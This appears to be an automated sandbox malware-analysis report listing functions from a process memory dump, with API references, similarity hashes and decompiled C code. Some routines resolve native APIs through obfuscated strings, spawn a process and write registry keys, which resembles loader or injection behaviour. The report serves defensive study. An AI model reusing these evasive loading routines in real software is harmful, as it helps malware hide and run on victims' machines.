std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2612
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2634
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2653

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
String ID:
API String ID: 3869368768-0
Opcode ID: 149c5aae32532379ee9ab7c12b45de861af977d4f4e61cc160fd932d2147254c
Instruction ID: 9d7816aefc557e95226af2557501fead26d0dc5e5da37e7f149edd8d75877735
Opcode Fuzzy Hash: 149c5aae32532379ee9ab7c12b45de861af977d4f4e61cc160fd932d2147254c
Instruction Fuzzy Hash: DB510DB5E00248EFDB14CFD4C850BDEBBB9BF49314F108529E819AB385D731A989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6FEA, Relevance: 12.1, APIs: 8, Instructions: 77COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 6E1D6FF9
__decode_pointer.LIBCMT ref: 6E1D7009

Part of subcall function 6E1DAC7A: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DACB9
Part of subcall function 6E1DAC7A: __crt_waiting_on_module_handle.LIBCMT ref: 6E1DACC4
Part of subcall function 6E1DAC7A: GetProcAddress.KERNEL32(00000000,6E1FDE6C), ref: 6E1DACD4

__msize.LIBCMT ref: 6E1D7027
__realloc_crt.LIBCMT ref: 6E1D704B
__realloc_crt.LIBCMT ref: 6E1D7061
__encode_pointer.LIBCMT ref: 6E1D7073
__encode_pointer.LIBCMT ref: 6E1D7081
__encode_pointer.LIBCMT ref: 6E1D708C

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__msize
String ID:
API String ID: 1462085885-0
Opcode ID: 421d13213a38d08f73429c71f647deb47a7df6cb4f2de4072cd0c2b31683ce71
Instruction ID: 2d3159ee4e6a9cbf5a2163ca0c512ce6c3ef675c20a20a4ec499b8c3cbe86f92
Opcode Fuzzy Hash: 421d13213a38d08f73429c71f647deb47a7df6cb4f2de4072cd0c2b31683ce71
Instruction Fuzzy Hash: 3311D67360461AAFAB15DBB9DC548DD3BEEFA422A47240427E404D71D0FF22DDC9A650

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3DFC, Relevance: 12.0, APIs: 8, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D3E03
std::_Lockit::_Lockit.LIBCPMT ref: 6E1D3E0D
int.LIBCPMTD ref: 6E1D3E24

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

codecvt.LIBCPMT ref: 6E1D3E47
std::bad_exception::bad_exception.LIBCMT ref: 6E1D3E5B
__CxxThrowException@8.LIBCMT ref: 6E1D3E69
std::locale::facet::_Incref.LIBCPMTD ref: 6E1D3E79
std::locale::facet::facet_Register.LIBCPMT ref: 6E1D3E7F

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 1213051545-0
Opcode ID: 9ffca47bd1bbfc1de682883c1986158b910516e165fd9dd4921d0e22ea5e74d3
Instruction ID: 0871e79236cb69b46e38c73c00404bde10ecb0da6678f626a65ca2006bb922e2
Opcode Fuzzy Hash: 9ffca47bd1bbfc1de682883c1986158b910516e165fd9dd4921d0e22ea5e74d3
Instruction Fuzzy Hash: 980165318005199BCF05DBE0C855AEEB33EBF90628F640919D121AB2D0DF789A8AF791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3BDD, Relevance: 12.0, APIs: 8, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D3BE4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1D3BEE
int.LIBCPMTD ref: 6E1D3C05

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

ctype.LIBCPMT ref: 6E1D3C28
std::bad_exception::bad_exception.LIBCMT ref: 6E1D3C3C
__CxxThrowException@8.LIBCMT ref: 6E1D3C4A
std::locale::facet::_Incref.LIBCPMTD ref: 6E1D3C5A
std::locale::facet::facet_Register.LIBCPMT ref: 6E1D3C60

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 1593823581-0
Opcode ID: c92916f1788c7eb43e247fd3a3f036f4c395539a8fb6de3a81ba5cd6edeada9c
Instruction ID: 5c0dd25bdb36a49be9b0b5ea46e723c9460e4cdf0d8514f21aeac28b5bf3f8c4
Opcode Fuzzy Hash: c92916f1788c7eb43e247fd3a3f036f4c395539a8fb6de3a81ba5cd6edeada9c
Instruction Fuzzy Hash: 1F0184728005199BCB05DBE4C945AEEB33EBF50768F600919D020AB2D0DF749ACAF791

Uniqueness

Uniqueness Score: -1.00%

Function 01188EA1, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01188EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0118592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0118A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x118d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x118d2a8; // 0x48aa5a8
					_t18 = _t47 + 0x118e3e6; // 0x73797325
					_t68 = E01183C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x118d2a8; // 0x48aa5a8
						_t19 = _t50 + 0x118e747; // 0x5a38cef
						_t20 = _t50 + 0x118e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0118A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0118A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x118d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E0118A734(_t70);
				goto L12;
			}

0x01188ea9
0x01188ea9
0x01188eb8
0x01188ebf
0x01188ec4
0x01188fd1
0x01188fd8
0x01188fd8
0x01188ed3
0x01188edb
0x01188ede
0x01188ee3
0x01188ef8
0x01188efe
0x01188eff
0x01188f02
0x01188f08
0x01188f0b
0x01188f10
0x01188f18
0x01188f24
0x01188f28
0x01188fb8
0x01188f2e
0x01188f2e
0x01188f33
0x01188f3a
0x01188f4e
0x01188f52
0x01188fa1
0x01188f54
0x01188f55
0x01188f5c
0x01188f75
0x01188f77
0x01188f7b
0x01188f82
0x01188f9c
0x01188f84
0x01188f8d
0x01188f92
0x01188f92
0x01188f82
0x01188fb0
0x01188fb0
0x01188f28
0x01188fbf
0x01188fc8
0x01188fcc
0x00000000

APIs

Part of subcall function 0118592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01188EBD,?,00000001,?,?,00000000,00000000), ref: 01185952
Part of subcall function 0118592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01185974
Part of subcall function 0118592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0118598A
Part of subcall function 0118592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 011859A0
Part of subcall function 0118592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 011859B6
Part of subcall function 0118592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 011859CC

memset.NTDLL ref: 01188F0B

Part of subcall function 01183C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,01188F24,73797325), ref: 01183C59
Part of subcall function 01183C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01183C73

GetModuleHandleA.KERNEL32(4E52454B,05A38CEF,73797325), ref: 01188F41
GetProcAddress.KERNEL32(00000000), ref: 01188F48
HeapFree.KERNEL32(00000000,00000000), ref: 01188FB0

Part of subcall function 0118A62D: GetProcAddress.KERNEL32(36776F57,0118A2D4), ref: 0118A648

CloseHandle.KERNEL32(00000000,00000001), ref: 01188F8D
CloseHandle.KERNEL32(?), ref: 01188F92
GetLastError.KERNEL32(00000001), ref: 01188F96

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 56105aef38f34fa75be4fca8a3720e1953a1f8d6165db3f8dd783d7104eb56cd
Instruction ID: 5997b2636a4cd0ab51a3e041a075dece88be69417fae513973f30f6a5cef4a6b
Opcode Fuzzy Hash: 56105aef38f34fa75be4fca8a3720e1953a1f8d6165db3f8dd783d7104eb56cd
Instruction Fuzzy Hash: DD316FB6800209AFDB29BFA4DC88D9EBBBDEF04258F108465F616A7110D7319D45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CE8B0, Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6E1CE912

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 10059899d56e9d594106df0b1951fb06e436ed501da2cabf923a2b67adfcdf17
Instruction ID: 3cec50ac69d8f08296cdc263d1917b6385b913009a3c50e9b72b2c4d9d3a3280
Opcode Fuzzy Hash: 10059899d56e9d594106df0b1951fb06e436ed501da2cabf923a2b67adfcdf17
Instruction Fuzzy Hash: A3415B71810518DFDB14CBD4CC92FEDF375BB24714F108A9A941AAB284DB34AB85DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 01181BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E01181BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x118d2a8; // 0x48aa5a8
				_t1 = _t9 + 0x118e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0118173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E0118A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E011864EF(_t34, _t41, _a8);
						E0118A734(_t41);
						_t42 = E01186467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0118A734(_t36);
							_t36 = _t42;
						}
						_t43 = E011817E5(_t36, _t33);
						if(_t43 != 0) {
							E0118A734(_t36);
							_t36 = _t43;
						}
					}
					E0118A734(_t28);
				}
				return _t36;
			}

0x01181bb6
0x01181bb9
0x01181bba
0x01181bc2
0x01181bc9
0x01181bd0
0x01181bd4
0x01181bda
0x01181be1
0x01181be6
0x01181bf8
0x01181bfc
0x01181c00
0x01181c06
0x01181c0b
0x01181c1b
0x01181c1d
0x01181c34
0x01181c38
0x01181c3b
0x01181c40
0x01181c40
0x01181c49
0x01181c4d
0x01181c50
0x01181c55
0x01181c55
0x01181c4d
0x01181c58
0x01181c58
0x01181c63

APIs

Part of subcall function 0118173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,01181BD0,253D7325,00000000,00000000,7742C740,?,?,011820C2,?), ref: 011817A4
Part of subcall function 0118173D: sprintf.NTDLL ref: 011817C5

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,011820C2,?,05A395B0), ref: 01181BE1
lstrlen.KERNEL32(?,?,?,011820C2,?,05A395B0), ref: 01181BE9

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

strcpy.NTDLL ref: 01181C00
lstrcat.KERNEL32(00000000,?), ref: 01181C0B

Part of subcall function 011864EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,01181C1A,00000000,?,?,?,011820C2,?,05A395B0), ref: 01186506

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,011820C2,?,05A395B0), ref: 01181C28

Part of subcall function 01186467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01181C34,00000000,?,?,011820C2,?,05A395B0), ref: 01186471
Part of subcall function 01186467: _snprintf.NTDLL ref: 011864CF

Strings

=, xrefs: 01181C22

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: cc168feb7d5853c5206a823c5cc4ae93d8e0cbbe30a4e4e8c475a42d3d96a94e
Instruction ID: fdb50521d8a12b23aeae994576722d7583c651edfa9df646fe375f92a0289a1e
Opcode Fuzzy Hash: cc168feb7d5853c5206a823c5cc4ae93d8e0cbbe30a4e4e8c475a42d3d96a94e
Instruction Fuzzy Hash: 491129775016267B8B2E7BB8AC84CAF3AAD9F55568355C026F6059B100DF34CC039FE0

Uniqueness

Uniqueness Score: -1.00%

Function 01186891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 011868EB
SysAllocString.OLEAUT32(0070006F), ref: 011868FF
SysAllocString.OLEAUT32(00000000), ref: 01186911
SysFreeString.OLEAUT32(00000000), ref: 01186979
SysFreeString.OLEAUT32(00000000), ref: 01186988
SysFreeString.OLEAUT32(00000000), ref: 01186993

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 33cfb16d77b69960e5b9f2c5fe6fe14b314dfd79ae31b445ab624853aa9ee896
Instruction ID: b4f543fffbd2bdb381e579062e828625de9aa412e5766c655280b22f349283ab
Opcode Fuzzy Hash: 33cfb16d77b69960e5b9f2c5fe6fe14b314dfd79ae31b445ab624853aa9ee896
Instruction Fuzzy Hash: 42415136D00609AFDB05EFBCD844ADEBBBAAF49210F148465EA14EB260DB719905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0118592D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0118592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0118A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x118d2a8; // 0x48aa5a8
					_t1 = _t23 + 0x118e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x118d2a8; // 0x48aa5a8
					_t2 = _t26 + 0x118e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0118A734(_t54);
					} else {
						_t30 =  *0x118d2a8; // 0x48aa5a8
						_t5 = _t30 + 0x118e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x118d2a8; // 0x48aa5a8
							_t7 = _t33 + 0x118e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x118d2a8; // 0x48aa5a8
								_t9 = _t36 + 0x118e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x118d2a8; // 0x48aa5a8
									_t11 = _t39 + 0x118e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E01186604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0118593c
0x01185940
0x01185a02
0x01185946
0x01185946
0x0118594b
0x0118595e
0x01185960
0x01185965
0x0118596d
0x01185974
0x01185976
0x0118597b
0x011859fa
0x011859fb
0x0118597d
0x0118597d
0x01185982
0x0118598a
0x0118598c
0x01185991
0x00000000
0x01185993
0x01185993
0x01185998
0x011859a0
0x011859a2
0x011859a7
0x00000000
0x011859a9
0x011859a9
0x011859ae
0x011859b6
0x011859b8
0x011859bd
0x00000000
0x011859bf
0x011859bf
0x011859c4
0x011859cc
0x011859ce
0x011859d3
0x00000000
0x011859d5
0x011859db
0x011859e0
0x011859e7
0x011859ec
0x011859f1
0x00000000
0x011859f3
0x011859f6
0x011859f6
0x011859f1
0x011859d3
0x011859bd
0x011859a7
0x01185991
0x0118597b
0x01185a10

APIs

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01188EBD,?,00000001,?,?,00000000,00000000), ref: 01185952
GetProcAddress.KERNEL32(00000000,7243775A), ref: 01185974
GetProcAddress.KERNEL32(00000000,614D775A), ref: 0118598A
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 011859A0
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 011859B6
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 011859CC

Part of subcall function 01186604: memset.NTDLL ref: 01186683

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: d4780ab1f34fb8d8936ff46842d665a93a9f2c4f983b3d41eb38db16417d4c44
Instruction ID: cc54bbe201cca9269e4b60cc2bb6a377e50b167a7395021398ee697df89c8b1c
Opcode Fuzzy Hash: d4780ab1f34fb8d8936ff46842d665a93a9f2c4f983b3d41eb38db16417d4c44
Instruction Fuzzy Hash: 9C2171B4501706AFEB68FFADE884D5AB7EDEF04264711C126E505C7210EB70E949CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D8290, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6E1D82B8

Part of subcall function 6E1D6431: __getptd.LIBCMT ref: 6E1D643F
Part of subcall function 6E1D6431: __getptd.LIBCMT ref: 6E1D644D

__getptd.LIBCMT ref: 6E1D82C2

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D82D0
__getptd.LIBCMT ref: 6E1D82DE
__getptd.LIBCMT ref: 6E1D82E9
_CallCatchBlock2.LIBCMT ref: 6E1D830F

Part of subcall function 6E1D64D6: __CallSettingFrame@12.LIBCMT ref: 6E1D6522

Part of subcall function 6E1D83B6: __getptd.LIBCMT ref: 6E1D83C5
Part of subcall function 6E1D83B6: __getptd.LIBCMT ref: 6E1D83D3

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d4d9ddd75267794bb2dc1c8719d77f810e5e24a8f0620d045c8e4b5e46c92a64
Instruction ID: f865f345b9e65ab562136507cde0884e38f78843ff439cc5d87033569feee633
Opcode Fuzzy Hash: d4d9ddd75267794bb2dc1c8719d77f810e5e24a8f0620d045c8e4b5e46c92a64
Instruction Fuzzy Hash: 7411A7B1C00209DFDB01DFE4C544AEE7BB9FF04318F108969E814A7250EB789A59EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1700, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 269COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6E1D172F

Part of subcall function 6E1CE4D0: std::locale::locale.LIBCPMTD ref: 6E1CE4EA

Part of subcall function 6E1D1F70: std::_Lockit::_Lockit.LIBCPMT ref: 6E1D1F9A
Part of subcall function 6E1D1F70: int.LIBCPMTD ref: 6E1D1FB3

Part of subcall function 6E1CE200: std::locale::facet::_Decref.LIBCPMTD ref: 6E1CE216

numpunct.LIBCPMTD ref: 6E1D1769
_memmove_s.LIBCMT ref: 6E1D1868
std::ios_base::width.LIBCPMTD ref: 6E1D19DA

Strings

@, xrefs: 6E1D18E1

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: DecrefLockitLockit::__memmove_snumpunctstd::_std::ios_base::getlocstd::ios_base::widthstd::locale::facet::_std::locale::locale
String ID: @
API String ID: 3659140288-2766056989
Opcode ID: d7c9a8195c05875df4850439fb9ce50fd5352511f08eb7f2e3fb56595c7d5fd5
Instruction ID: cf9427d85de8a056804b0bf8f891f0c487a5ee7b30a7c21ff13fcb4322b78fef
Opcode Fuzzy Hash: d7c9a8195c05875df4850439fb9ce50fd5352511f08eb7f2e3fb56595c7d5fd5
Instruction Fuzzy Hash: 65B13B71A041499FCB04CF98C990AEEBBFABF49304F20865DE919A7351D734A985DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0118853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0118853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x118d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E01189070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E01186E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E0118A734(_a8);
						goto L29;
					}
					_t64 =  *0x118d278; // 0x5a39a98
					_t16 = _t64 + 0xc; // 0x5a39b66
					_t65 = E01189070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0118c0
						if(E011822F1(_t97,  *_t33, _t91, _a8,  *0x118d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x118d2a8; // 0x48aa5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x118ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x118e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E01186C38(_t69,  *0x118d334,  *0x118d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x118d2a8; // 0x48aa5a8
									_t44 = _t71 + 0x118e846; // 0x74666f53
									_t73 = E01189070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0118c0
										E01185D7D( *_t47, _t91, _a8,  *0x118d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d0118c0
										E01185D7D( *_t49, _t91, _t99,  *0x118d330, _a16);
										E0118A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0118c0
									E01185D7D( *_t40, _t91, _a8,  *0x118d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d0118c0
									E01185D7D( *_t43, _t91, _a8,  *0x118d330, _a16);
								}
								if( *_t101 != 0) {
									E0118A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0118c0
					_t81 = E01188BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0118c0
							E011822F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E0118A734(_t100);
						_t98 = _a16;
					}
					E0118A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0118A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x118d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x0118853f
0x01188548
0x0118854f
0x01188554
0x011885c1
0x011885c7
0x011885cc
0x011885d3
0x011885d8
0x011885dd
0x01188748
0x0118874f
0x0118874f
0x01188754
0x01188756
0x01188756
0x0118875f
0x0118875f
0x011885e3
0x011885ef
0x0118873e
0x01188741
0x00000000
0x01188741
0x011885f5
0x011885fa
0x011885fd
0x01188602
0x01188607
0x01188650
0x01188650
0x01188663
